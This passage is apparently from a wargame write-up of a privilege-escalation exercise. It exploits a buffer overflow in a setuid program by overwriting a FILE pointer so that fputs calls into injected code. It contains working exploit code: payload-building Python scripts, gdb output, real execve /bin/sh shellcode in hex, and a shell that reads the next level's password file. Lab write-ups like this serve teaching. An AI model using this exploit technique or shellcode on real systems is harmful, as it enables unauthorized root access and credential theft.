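    """Sign-extend an 8-bit value to 32 bits, like the movsbl instruction."""
    byte &= 0xFF
    return byte | 0xFFFFFF00 if byte & 0x80 else byte


def loaded_dword_offset(byte_at_0x46):
    """Offset from fp of the long word read by mov 0x94(%esi,%eax,1),%eax."""
    return (0x94 + movsbl(byte_at_0x46)) & 0xFFFFFFFF


for value in (0x01, 0x7f, 0x80, 0xff):
    print("byte %#04x -> eax %#010x -> reads fp+%#x"
          % (value, movsbl(value), loaded_dword_offset(value)))
```

Values of 0x80 and above turn into negative offsets, so sticking to a small positive byte keeps the load comfortably inside the area we control.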
Let's see what happens next:

0x001b251f <fputs+127>: mov    %edx,0x8(%esp)
0x001b2523 <fputs+131>: mov    0x8(%ebp),%edx
0x001b2526 <fputs+134>: mov    %esi,(%esp)
0x001b2529 <fputs+137>: mov    %edx,0x4(%esp)
0x001b252d <fputs+141>: call   *0x1c(%eax)

This piece of code sets up three function arguments (fp, the string and its length), but we don't care about them, because what it does next is call the function whose address is stored at eax+0x1c.

It should be clear by this time what we need to do:

Whatever we have in the first argument to the program will be copied into buf.
The payload should start with 0x80808080 to make sure we pass the flag check.
The byte at offset 0x46 needs to be something other than 0x00; let's just choose 0x01.
The long word at offset 0x94+0x01=0x95 should contain a pointer. Let's make it point to offset 0x95+4=0x99 (just one slot after the current one).
At offset 0x99+0x1c=0xb5 we should have another pointer, this time to offset 0xb5+4=0xb9.
Then we insert the shellcode, starting at offset 0xb9.
Then there should be some filler which will complete the payload to 0x411 bytes.
The last 4 bytes will overwrite fp, so they should be the address of the start of buf.
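
Before going near the real binary, the plan can be sanity-checked offline. The sketch below (Python 3) builds a payload following the steps above and then replays the loads fputs performs to see where the final call would land. The buf address and the shellcode bytes here are placeholders I chose for illustration, and follow_fputs only models the handful of instructions discussed in this post, not the real libc function.

```python
import struct

BUF = 0xbfffd25f             # placeholder; the real value depends on ebp
SHELLCODE = b"\xcc" * 25     # stand-in bytes, not real shellcode


def build_payload(buf, shellcode):
    payload = struct.pack("<L", 0x80808080)        # passes the 0x8000 test
    payload += b"\x90" * (0x46 - len(payload))
    payload += b"\x01"                             # non-zero byte at 0x46
    payload += b"\x90" * (0x95 - len(payload))
    payload += struct.pack("<L", buf + 0x99)       # read via 0x94(fp, 1)
    payload += b"\x90" * (0xb5 - len(payload))
    payload += struct.pack("<L", buf + 0xb9)       # read via 0x1c(eax)
    payload += shellcode                           # starts at offset 0xb9
    payload += b"\x90" * (0x411 - len(payload))
    payload += struct.pack("<L", buf)              # overwrites fp
    return payload


def follow_fputs(buf, payload):
    """Replay the loads done on fp and return the address that gets called."""
    def dword(address):
        return struct.unpack_from("<L", payload, address - buf)[0]

    fp = dword(buf + 0x411)                # what main will pass to fputs
    assert dword(fp) & 0x8000              # jne at fputs+53 must be taken
    index = payload[fp + 0x46 - buf]
    assert index != 0                      # je at fputs+111 must not be taken
    if index & 0x80:
        index -= 0x100                     # movsbl sign extension
    table = dword(fp + 0x94 + index)
    return dword(table + 0x1c)


payload = build_payload(BUF, SHELLCODE)
target = follow_fputs(BUF, payload)
print("payload length: %#x" % len(payload))
print("call lands at buf+%#x" % (target - BUF))
```

It is also worth confirming that the payload contains no zero bytes, since strcpy would stop copying at the first one.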

Or, better put in a diagram:

All that's left now is to discover ebp so we can fill that structure up. Remember that the payload is 0x411+4=0x415 bytes long:

level6@blackbox:~$ gdb fsp
...

(gdb) break main
Breakpoint 1 at 0x8048452
(gdb) run `python -c "print 'a'*0x415"`
Starting program: /home/level6/fsp `python -c "print 'a'*0x415"`

Breakpoint 1, 0x08048452 in main ()
(gdb) p $ebp
$1 = (void *) 0xbfffd678

And write some script to generate the payload:

level6@blackbox:/tmp$ cd /tmp
level6@blackbox:/tmp$ cat > genpayload.py
import struct
EBP = 0xbfffd678
BUF = EBP - 0x419
PTR1 = BUF + 0x99
PTR2 = BUF + 0xb9
SHELLCODE = "31c050682f2f7368682f62696e89e3505389e131d2b00bcd80".decode("hex")

FILE = ""
FILE += struct.pack("<L", 0x80808080)
FILE += '\x90' * (0x46 - 4)
FILE += "\x01"
FILE += '\x90' * (0x95 - 0x47)
FILE += struct.pack("<L", PTR1)
FILE += '\x90' * (0xb5 - 0x99)
FILE += struct.pack("<L", PTR2)
FILE += SHELLCODE
FILE += '\x90' * (0x419 - 8 - len(FILE))
FILE += struct.pack("<L", BUF)

print FILE

Let's give it a shot:

level6@blackbox:~$ ~/fsp `python /tmp/genpayload.py`
sh-3.1$ cat /home/level7/password
cat: /home/level7/password: No such file or directory
sh-3.1$ cat /home/level7/passwd
??????????

Done!